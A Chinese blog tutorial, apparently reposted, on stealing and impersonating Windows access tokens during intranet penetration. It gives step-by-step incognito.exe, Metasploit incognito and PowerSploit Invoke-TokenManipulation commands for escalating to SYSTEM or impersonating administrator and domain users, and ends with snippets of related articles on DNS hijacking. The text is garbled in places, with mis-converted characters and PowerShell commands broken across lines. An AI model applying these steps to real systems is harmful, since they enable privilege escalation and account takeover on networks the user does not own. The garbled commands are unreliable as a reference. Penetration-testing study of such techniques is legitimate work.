內網滲透之AccessToken竊取與利用

2021-10-05 18:58:08 字數 3241 閱讀 8986

msf實戰假冒令牌提權

令牌(token)是系統的臨時秘鑰,相當於賬號和密碼,用來決定是否允許這次請求和判斷這次請求是屬於哪乙個使用者的。它允許你在不提供密碼或其他憑證的前提下,訪問網路和系統資源,這些令牌將持續存在於系統中,除非系統重新啟動。令牌最大的特點就是隨機性,不可**,黑客或軟體無法猜測出令牌。

假冒令牌可以假冒乙個網路中的另乙個使用者進行各類操作。所以當乙個攻擊者需要域管理員的操作許可權時候,需要通過假冒域管理員的令牌進行攻擊。

令牌有很多種:

windows的accesstoken有兩種型別:

注:兩種token只在系統重啟後清除 具有delegation token的使用者在登出後,該token將變成impersonation token,依舊有效。

accesstoken的竊取與利用需要administrator管理員許可權。也就是說要提權。

竊取accesstoken的方法:

incognito.exe程式 、invoketokenmanipulat.ps1指令碼 、msf裡的incognito模組

accesstoken的列舉(需要administrator許可權)

操作:模擬其他使用者的令牌(複製token)如果要使用accesstoken模擬其他使用者,可以使用命令

incognito.exe execute -c "完整的token名" cmd.exe

例如:模擬system許可權使用者(提權至system):

incognito.exe execute -c "nt authority\system" cmd.exe

降權至當前使用者:

incognito.exe execute -c "當前使用者token" cmd.exe

需要administrator許可權

use incognito #載入incognito

list_tokens -u #列出accesstoken

getuid #檢視當前token

impersonate_token "nt authority\system"

#模擬system使用者,getsystem命令即實現了該命令。如果要模擬其他使用者,將token名改為其他使用者即可

steal_token 1252

#從程序竊取token

getsystem #提公升至system許可權

rev2self #返回到之前的accesstoken許可權

這個指令碼是powersploit下exfiltration資料夾內的乙個指令碼

使用命令如下:

列舉token:

invoke

-tokenmanipulation

-enumerate

提權至system:

invoke

-tokenmanipulation

-createprocess

"cmd.exe"

-username

"nt authoritysystem"

複製(竊取)程序token:

invoke

-tokenmanipulation

-createprocess

"cmd.exe"

-processid

500複製(竊取)執行緒token:

假設我們現在已經獲得了目標主機的許可權,但是通過 getsystem 和其他方式提權失敗。

此時,我們可以嘗試使用假冒令牌進行提權。

use incognito           #進入incognito模組

list_tokens -u #列出令牌

如圖,可以看到有兩種型別的令牌。

令牌的資料取決於當前獲取許可權的高低。

當前列出了3個令牌。我們就可以通過下面的命令假冒 administrator 使用者了。

impersonate_token win2008\\adminstrator     #假冒win2008\adminstrator  的令牌

impersonate_token win2008\\test #假冒win2008\test 的令牌

impersonate_token "nt authority\system"

#假冒system的令牌

從程序竊取令牌

steal_token 1252

返回之前的token

原文:

內網滲透之dns劫持

dns欺騙,被攻擊的主機訪問任意 的回被轉到特定的釣魚 實驗工具 kali linux 黑客機 win10 肉雞 apache2 ettercap 操作步驟 1,開啟kali上的apache2服務,kali service apache2 start root kali service apache...

內網滲透 內網滲透測試基礎 1

內網也指區域網 local area network 是指在某一區域內由多台計算機互聯而成的計算機組,組網範圍通常在數千公尺以內。在區域網中,可以實現檔案管理 應用軟體共享 印表機共享 工作組內的日程安排 電子郵件和傳真通訊服務等。內網是封閉的,可以由辦公室內的兩台計算機組成,也可以由乙個公司內的大...

再談內網滲透

前言 看了 g.r0b1n文章 內網滲透 抑制不住自己衝動的心情,寫一篇 再談內網滲透 希望以後有朋友能更新 詳談內網滲透 在我的腦子裡面我始終認為,一次滲透至少要控制被滲透物件80 以上伺服器才能算得上一次成功的滲透。希望朋友們能夠多提寶貴意見。正文 我沒有內網域裡面某個機器的許可權,我只有乙個存...